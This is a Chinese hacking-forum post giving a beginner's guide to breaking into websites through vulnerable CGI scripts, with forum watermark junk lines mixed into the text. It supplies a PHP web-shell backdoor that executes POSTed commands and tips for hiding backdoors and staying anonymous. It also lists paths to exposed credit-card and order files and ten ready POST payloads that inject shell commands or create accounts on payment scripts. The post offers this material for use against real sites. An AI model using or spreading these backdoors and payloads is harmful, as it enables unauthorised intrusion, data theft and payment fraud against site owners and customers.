CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
# H8 Q! R8 g& W& M$ \很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
我会长长来玩的
# O" B2 |- x- }* J( L5 E前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
7 ^+ E7 ?* n! U" o8 o0 D( _我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
; _/ |5 h! O, Y' F# \( E9 T9 z6 I目录为/cgi-bin/
6 J% o2 q+ M9 j9 v7 T& z: \% N$ |/ u
9 N) I$ W4 u( e+ f& I" A只是个人在实务上一些经验
写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
: P9 n/ z' [8 ^: l; C! x" s+ S" ~) m让没有基础的人很容易上手
$ k" D0 g5 @, G$ B
$ l- S" A1 Z+ S以下内容跟帖回复才能看到
==============================

$ ^5 F" j) o7 o2 g6 A第1部份: 何谓Shell?
8 |% _7 V5 b. X: {5 W+ k; G  NShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
( L8 B3 a) i0 l4 I- w2 m+ {' n: m- M. o4 KA shell is the program which reads user input from the command line and executes actions based upon that input.
1 c$ Y0 u: a# A. D: [' H. E意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

9 a8 [  t$ p2 I; ^, H8 {3 }1 [5 {对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
# y' ~6 K) l& m1 b
0 j% U% c/ k$ u6 s0 Y  t( Y第2部份: Unix 指令
以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
6 [8 q/ W  \8 F; U# n$ ]. vls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
# m: w: P6 N+ b5 Z! p& I( Ols -al :详细列出档案资料(当前目录)
ls /: 列出根目录
4 w: D. ]0 C- e: W' O/ g; Tls /etc: 列出/etc的资料夹及档案
3 n, @& w6 ~7 L1 \5 _ls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
9 T" J  Y, e- ~: V, U% N2 T0 ]cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
7 {" z" V* T. w" s1 b9 C) Twho: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
8 |- w3 o7 H- P2 b9 r. y8 wmv 移动档案
rm 删除档案

第3部份: Shell的使用
例如:
/ @  m, n; z/ \* w, V  y( Khttp://site.com/refer.php
0 i5 @; C8 M5 c( C) k这是我的後门, 原代码如下:
7 P( A# m& J8 l* m+ t" b0 }: @; I<Form Action="#" Method="POST">
$ }7 I" A! ^7 Q+ d* |<Input type="text" name="cmd">
( S* e; `$ C1 w2 c<Input type="Submit">
: s# S1 K3 N& R( Y" B5 a: T</Form>
<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
" P" ~) }5 C! L* Q" R& R) H" e/ r( mecho $Output;
4 X9 A  C5 I$ d& T) H& j, c?>
输入pwd, 可得到绝对路径:
9 j6 B9 h8 n  E) ~; d' Q$ d* B/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

第4部份: 注意事项
7 A3 ^" I' A1 {* [- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
7 `. e* u, m! {5 h1 g( C- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
9 h+ u% p1 X! w8 s不容易被发现.
( `/ s! W- d4 [- d3 A0 V- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
$ {) M- \7 |! o开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下

% i7 C1 e5 g* h( H9 S1.一开始对一个网站进行cgi漏洞扫描
9 n& W3 M' e2 T" E5 G7 n( L& D4 s我们需要的东西有
扫洞工具 如:triton..等等
E表
  q) Y8 i/ M2 k) \4 P+ l, n如
/ O. Y7 R! n0 ?) m7 H/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
3 @: C% U6 ]4 c4 G: m6 c# s/Admin_files/order.log
/orders/mountain.cfg
' b# F9 l1 K& o. K% y5 p/cgi-sys/cart.pl
; k4 @% m( |9 z/scripts/cart.pl
/htbin/cart.pl
6 i* P% d  w& z* Z: Y# c7 WE表来源可以是网路收寻或是自己的0 day
0 F& w8 \1 z$ }
( g+ m. |# Q9 E& x* e+ S. Q" h2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
7 u# I/ O( `$ m& z一般都是在IE里先看一下的,记住这个返回码哦
4 S+ a( o4 s/ W! ?9 P6 h% SERROR:This script should be referenced with a METHOD of POST.
& X$ B2 S* k- Q' \: ~没有返回一定是假的
4 Z# O: m8 u$ k% @8 k3.重来来了 很多人都会问我
% W0 _; l' u- S3 w( I他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
! C' c' b# J! l5 ~可以是源代码分析 找出介质
+ |9 e9 H8 k$ K: {8 W或是用抓包工具 抓他的语法...等等

" z* T- F) s6 y, C以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
wei=ren&gen=command
/ d0 c! l9 `5 |/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
) I7 _0 ?7 o3 r7 x6 V/form.cgi
2 D% `' q( C( I+ Pname=xxxx&email=email&subject=xxxx&response=|echo;ls|
0 L2 U8 J- h+ s2 L/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
. v* o; v- v0 @: X/ r( K: t8 \& a/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
3 w9 d* E: h$ N# f8 E* @  g# w/recon.cgi
( |; H' l/ |: ~) q5 i/ C/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
4 C- Z; @% g( |, g' {8 b' r8 U/verotelrum.pl
3 y: l6 ]* l7 t- ^; \  I* avercode=username:password:dseegsow:add:amount<&30>
: c) m% X( u5 Z: S# E! n/af.cgi_browser_out=|echo;ls -la;exit;|
) m, D2 {. O  U+ l
今天就讲到这  感谢大家支持